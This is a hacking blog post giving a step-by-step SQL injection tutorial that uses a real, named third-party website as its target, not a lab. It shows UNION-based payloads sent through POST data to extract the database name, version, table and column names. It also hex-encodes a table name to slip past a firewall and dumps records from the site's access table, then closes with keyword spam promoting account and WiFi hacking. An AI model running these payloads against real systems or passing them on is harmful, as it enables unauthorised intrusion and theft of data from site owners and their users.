Sql Injection With Post Data

Less:-3. Sqli Post Data Based



Less:-3. Sqli Post Based.

Tutorials by Team Hind And CyberSecuritySquad
Intro About Me:-
Name :-                           Navdeep Singh
Facebook_id=                      https://www.facebook.com/navdeep.dhukia.5
Facebook_offical Page(CSS)=       https://www.facebook.com/BlackHatHackers555
Facebook_offical Page(Team_Hind)  https://www.facebook.com/TeamHind/
Website:-                         http://www.securitykiller.org

Before Check This Tutorial First See My last Two Less. That Is Simple Union Based Sqli, Union Based Sqli With WAF Bypass.

Reqirement:-
Hackbar On Mozila Addons

Step 1. Find The Injection Point On Any Php Site
(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid=  etc)
Like This Site :- www.site.com/index.php?id=1

Step2. After Find It First Check This Site Valurnable Or Not......
i Have A site http://www.pro9.co.uk/html/print.php?sid=258

we will add single quoto(') after:- ?id=11
Like This http://www.pro9.co.uk/html/print.php?sid=258'
Hit Enter

Step3. After adding the Sigle Quoto(') If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Valurnable.

Step4. Start The  Opration On Url, Now We Will Count total Number Of Columns In Information_schema.
               We Will Use Order By Query For The Count The Columns.
    Like This:-  http://www.pro9.co.uk/html/print.php?sid=258' order by 100--
   
        i am putting -- for comment out the query
        It is Showing error or Unknown Columns so.

        OOPS:- Error:- !- ACCESS DENIED -!
       
        Now try To Post Based Sqli
       
Step4.1 Open The Hack Bar And Click Load Url, Than Click On Post Data, Now Cut The (?sid=258) And Paste On Post data section, Remove (?).

Step4.2 Now start Opration On Post data Using Order By

Step4.3 Now I Select Just 20th number of columns for shorting the site data.
Like this:-     sid=258 order by 20--
still error

Here Is Total no. Of Columns Is 6 Because at 7 there is Error or Unknown Columns

Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:-  sid=-258 union select all 1,2,3,4,5,6--

Here Union Is Combining Both Of The Queries 1st one is site's Query and 2nd is my select query..

Here It Is Not Printing Vulnerable Columns Because There Is Not Sufficient Free Sapce To Print
Vulnerable Columns.... so i will hide site data by using - sign.


Here  Vulnerable Columns is 1,3,4,6.

Now We Will Fetch All The Data Using Column Number 1,3,4 And 6.


Step6.  Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:-        sid=-258 union select all 1,2,database(),4,5,6--

You See On Website Page:- Database Is= 'bigdave_mpn' , Version= '5.5.42-cll'



Step7. i Want tablenames from database....so now we will set where condition...
Like This:- sid=-258 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6 from information_schema.tables where table_schema=database()--

Here Is The List Of all tables On Database.



Step10. Now I Fetch Table name 'mpn_access'
Like This:-sid=-258 union select all 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=mpn_access--

oops Here Is Firwall That Block the table_name=mpn_access fetching.
now i will Encrypt The mpn_access in mysql_char().
LikeThis= sid=-258 union select all 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x6d706e5f616363657373--
 We Got It The mpn_access Columns.

Step11. Now i fetch Juicy Data  That Is   access_id,access_title
 like This:- sid=-258 union select all 1,2,group_concat(access_id,access_title),4,5,6 from mpn_access--




 Follow  Me On You Tube:-

 Less No.4:- sqli with Cookies Based.
 Upload on Tom. 30-08-2015

 We Are:- | VIKYP | INDCYBERJOCKER |  In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |

 Download This Txt File On You tube,Under This Video.

Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,

Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass, Wifi Hacking, Wifi Password Hacking
Sql Injection With Post Data Sql Injection With Post Data Reviewed by Unknown on 12/09/2015 Rating: 5
Powered by Blogger.